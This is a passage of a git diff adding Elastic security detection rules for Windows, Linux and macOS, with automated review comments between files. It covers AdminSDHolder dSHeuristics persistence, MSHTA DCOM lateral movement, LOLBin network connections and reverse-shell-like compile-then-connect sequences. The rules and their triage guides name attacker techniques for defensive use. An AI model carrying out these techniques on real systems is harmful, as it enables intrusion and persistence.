@@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a modification on the dsHeuristics attribute on the bit that holds the configuration of groups excluded from the SDProp process. The SDProp compares the permissions on protected objects with those defined on the AdminSDHolder object. If the permissions on any of the protected accounts and groups do not match, the permissions on the protected accounts and groups are reset to match those of the domain's AdminSDHolder object, meaning that groups excluded will remain unchanged. Attackers can abuse this misconfiguration to maintain long-term access to privileged accounts in these groups.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "AdminSDHolder SDProp Exclusion Added", + "note": "## Triage and analysis\n\n### Investigating AdminSDHolder SDProp Exclusion Added\n\nThe SDProp process compares the permissions on protected objects with those defined on the AdminSDHolder object. 
If the permissions on any of the protected accounts and groups do not match, it resets the permissions on the protected accounts and groups to match those defined in the domain AdminSDHolder object.\n\nThe dSHeuristics is a Unicode string attribute, in which each character in the string represents a heuristic that is used to determine the behavior of Active Directory.\n\nAdministrators can use the dSHeuristics attribute to exclude privilege groups from the SDProp process by setting the 16th bit (dwAdminSDExMask) of the string to a certain value, which represents the group(s):\n\n- For example, to exclude the Account Operators group, an administrator would modify the string, so the 16th character is set to 1 (i.e., 0000000001000001).\n\nThe usage of this exclusion can leave the accounts unprotected and facilitate the misconfiguration of privileges for the excluded groups, enabling attackers to add accounts to these groups to maintain long-term persistence with high privileges.\n\nThis rule matches changes of the dsHeuristics object where the 16th bit is set to a value other than zero.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the value assigned to the 16th bit of the string on the `winlog.event_data.AttributeValue` field:\n - Account Operators eq 1\n - Server Operators eq 2\n - Print Operators eq 4\n - Backup Operators eq 8\n The field value can range from 0 to f (15). If more than one group is specified, the values will be summed together; for example, Backup Operators and Print Operators will set the `c` value on the bit.\n\n### False positive analysis\n\n- While this modification can be done legitimately, it is not a best practice. 
Any potential benign true positive (B-TP) should be mapped and reviewed by the security team for alternatives as this weakens the security of the privileged group.\n\n### Response and remediation\n\n- The change can be reverted by setting the dwAdminSDExMask (16th bit) to 0 in dSHeuristics.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "any where event.action == \"Directory Service Changes\" and\n event.code == \"5136\" and\n winlog.event_data.AttributeLDAPDisplayName : \"dSHeuristics\" and\n length(winlog.event_data.AttributeValue) > 15 and\n winlog.event_data.AttributeValue regex~ \"[0-9]{15}([1-9a-f]).*\"\n", + "references": [ + "https://www.cert.ssi.gouv.fr/uploads/guide-ad.html#dsheuristics_bad", + "https://petri.com/active-directory-security-understanding-adminsdholder-object" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeLDAPDisplayName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeValue", + "type": "unknown" + } + ], + "risk_score": 73, + "rule_id": "61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7", + "setup": "## Setup\n\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define 
`event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Active Directory", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.002", + "name": "Domain Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/002/" + } + ] + }, + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/622ecb68-fa81-4601-90b5-f8cd661e4520_106.json b/packages/security_detection_engine/kibana/security_rule/622ecb68-fa81-4601-90b5-f8cd661e4520_106.json new file mode 100644 index 00000000000..6da93aaac35 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/622ecb68-fa81-4601-90b5-f8cd661e4520_106.json 
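Review bot: The `note` describes the value as the "16th bit (dwAdminSDExMask)" of dSHeuristics, but the query (`regex~ "[0-9]{15}([1-9a-f]).*"`) and the note's own 0–f value table treat it as the 16th character holding a hex mask; saying "16th character" throughout would make the triage text match what the rule actually tests. The regex also assumes the first fifteen characters are decimal digits, which is an assumption about the dSHeuristics format worth confirming against the referenced guides since the match depends on it. `length(winlog.event_data.AttributeValue) > 15` is implied by the regex but is harmless as a cheap pre-filter.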
@@ -0,0 +1,149 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of Distributed Component Object Model (DCOM) to execute commands from a remote host, which are launched via the HTA Application COM Object. This behavior may indicate an attacker abusing a DCOM application to move laterally while attempting to evade detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Incoming DCOM Lateral Movement via MSHTA", + "query": "sequence with maxspan=1m\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"mshta.exe\" and process.args : \"-Embedding\"\n ] by host.id, process.entity_id\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"mshta.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port > 49151 and destination.port > 49151 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n", + "references": [ + "https://codewhitesec.blogspot.com/2018/07/lethalhta.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + 
"name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + } + ], + "risk_score": 73, + "rule_id": "622ecb68-fa81-4601-90b5-f8cd661e4520", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.003", + "name": "Distributed Component Object Model", + "reference": "https://attack.mitre.org/techniques/T1021/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.005", + "name": "Mshta", + "reference": "https://attack.mitre.org/techniques/T1218/005/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "622ecb68-fa81-4601-90b5-f8cd661e4520_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/62b68eb2-1e47-4da7-85b6-8f478db5b272_4.json b/packages/security_detection_engine/kibana/security_rule/62b68eb2-1e47-4da7-85b6-8f478db5b272_4.json new file mode 100644 index 00000000000..66c1f7b2d4e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/62b68eb2-1e47-4da7-85b6-8f478db5b272_4.json 
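Review bot: This export has no `timestamp_override`, unlike the other rules in this change (61766ef9, 61ac3638 and 61d29caf all set `"timestamp_override": "event.ingested"`); for a `sequence with maxspan=1m` evaluated from `now-9m`, matching on `@timestamp` presumably leaves less tolerance for ingest delay than the other rules get. If the omission is intentional for this rule it would help to record why, otherwise adding `"timestamp_override": "event.ingested"` keeps it consistent with its siblings.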
@@ -0,0 +1,112 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies potentially malicious processes communicating via a port paring typically not associated with HTTP/HTTPS. For example, HTTP over port 8443 or port 440 as opposed to the traditional port 80 , 443. Adversaries may make changes to the standard port a protocol uses to bypass filtering or muddle analysis/parsing of network data.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Non-Standard Port HTTP/HTTPS connection", + "note": "## Triage and analysis\n\n### Investigating Potential Non-Standard Port HTTP/HTTPS connection\n\nAttackers may alter standard protocol ports, like using HTTP on port 8443 instead of 80, to bypass network filtering and complicate network data analysis. \n\nThis rule looks for HTTP/HTTPS processes where the destination port is not any of the default 80/443 HTTP/HTTPS ports. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Identify any signs of suspicious network activity or anomalies that may indicate command and control activity or data exfiltration. 
This could include unexpected traffic patterns or unusual network behavior.\n - Investigate listening ports and open sockets to look for potential suspicious network traffic, reverse shells or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n\n### Related rules\n\n- Suspicious Network Activity to the Internet by Previously Unknown Executable - 53617418-17b4-4e9c-8a2c-8deb8086ca4b\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors, such as reverse shells, reverse proxies, or droppers, that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "network where process.name : (\"http\", \"https\") and destination.port not in (80, 443) and event.action in (\n \"connection_attempted\", \"ipv4_connection_attempt_event\", \"connection_accepted\", \"ipv4_connection_accept_event\"\n) and destination.ip != \"127.0.0.1\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "62b68eb2-1e47-4da7-85b6-8f478db5b272", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Rule Type: BBR", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1571", + "name": "Non-Standard Port", + "reference": "https://attack.mitre.org/techniques/T1571/" + }, + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/", + "subtechnique": [ + { + "id": "T1071.001", + "name": "Web Protocols", + "reference": "https://attack.mitre.org/techniques/T1071/001/" + } + ] + }, + { + "id": "T1573", + "name": "Encrypted Channel", + 
"reference": "https://attack.mitre.org/techniques/T1573/", + "subtechnique": [ + { + "id": "T1573.001", + "name": "Symmetric Cryptography", + "reference": "https://attack.mitre.org/techniques/T1573/001/" + }, + { + "id": "T1573.002", + "name": "Asymmetric Cryptography", + "reference": "https://attack.mitre.org/techniques/T1573/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "62b68eb2-1e47-4da7-85b6-8f478db5b272_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_107.json b/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_107.json new file mode 100644 index 00000000000..22be1e84ba7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/63e65ec3-43b1-45b0-8f2d-45b34291dc44_107.json 
@@ -0,0 +1,92 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Adversaries may use these binaries to 'live off the land' and execute malicious files that could bypass application allowlists and signature validation.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Network Connection via Signed Binary", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Signed Binary\n\nBy examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule looks for the execution of `expand.exe`, `extrac32.exe`, `ieexec.exe`, or `makecab.exe` utilities, followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities to bypass detections and evade defenses.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT 
(user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and (process.name : \"expand.exe\" or process.name : \"extrac32.exe\" or\n process.name : \"ieexec.exe\" or process.name : \"makecab.exe\") and\n event.type == \"start\"]\n [network where host.os.type == \"windows\" and (process.name : \"expand.exe\" or process.name : \"extrac32.exe\" or\n process.name : \"ieexec.exe\" or process.name : \"makecab.exe\") and\n not cidrmatch(destination.ip,\n \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0.0/29\", \"192.0.0.8/32\",\n \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\",\n \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\", \"FE80::/10\", \"FF00::/8\")]\n", + "references": [ + "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + 
"risk_score": 21, + "rule_id": "63e65ec3-43b1-45b0-8f2d-45b34291dc44", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "type": "eql", + "version": 107 + }, + "id": "63e65ec3-43b1-45b0-8f2d-45b34291dc44_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_106.json b/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_106.json new file mode 100644 index 00000000000..cf98d2e80c7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6482255d-f468-45ea-a5b3-d3a7de1331ae_106.json 
@@ -0,0 +1,92 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies changes to the Safari configuration using the built-in defaults command. Adversaries may attempt to enable or disable certain Safari settings, such as enabling JavaScript from Apple Events to ease in the hijacking of the users browser.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Modification of Safari Settings via Defaults Command", + "query": "event.category:process and host.os.type:macos and event.type:start and\n process.name:defaults and process.args:\n (com.apple.Safari and write and not\n (\n UniversalSearchEnabled or\n SuppressSearchSuggestions or\n WebKitTabToLinksPreferenceKey or\n ShowFullURLInSmartSearchField or\n com.apple.Safari.ContentPageGroupIdentifier.WebKit2TabsToLinks\n )\n )\n", + "references": [ + "https://objectivebythesea.com/v2/talks/OBTS_v2_Zohar.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "6482255d-f468-45ea-a5b3-d3a7de1331ae", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "6482255d-f468-45ea-a5b3-d3a7de1331ae_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/64cfca9e-0f6f-4048-8251-9ec56a055e9e_5.json b/packages/security_detection_engine/kibana/security_rule/64cfca9e-0f6f-4048-8251-9ec56a055e9e_5.json new file mode 100644 index 00000000000..4519c356a30 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/64cfca9e-0f6f-4048-8251-9ec56a055e9e_5.json 
@@ -0,0 +1,118 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors a sequence involving a program compilation event followed by its execution and a subsequent network connection event. This behavior can indicate the set up of a reverse tcp connection to a command-and-control server. Attackers may spawn reverse shells to establish persistence onto a target system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Network Connection via Recently Compiled Executable", + "query": "sequence by host.id with maxspan=1m\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \n process.name in (\"gcc\", \"g++\", \"cc\")] by process.args\n [file where host.os.type == \"linux\" and event.action == \"creation\" and process.name == \"ld\"] by file.name\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\"] by process.name\n [network where host.os.type == \"linux\" and event.action == \"connection_attempted\" and destination.ip != null and \n not cidrmatch(destination.ip, \"127.0.0.0/8\", \"169.254.0.0/16\", \"224.0.0.0/4\", \"::1\")] by process.name\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": 
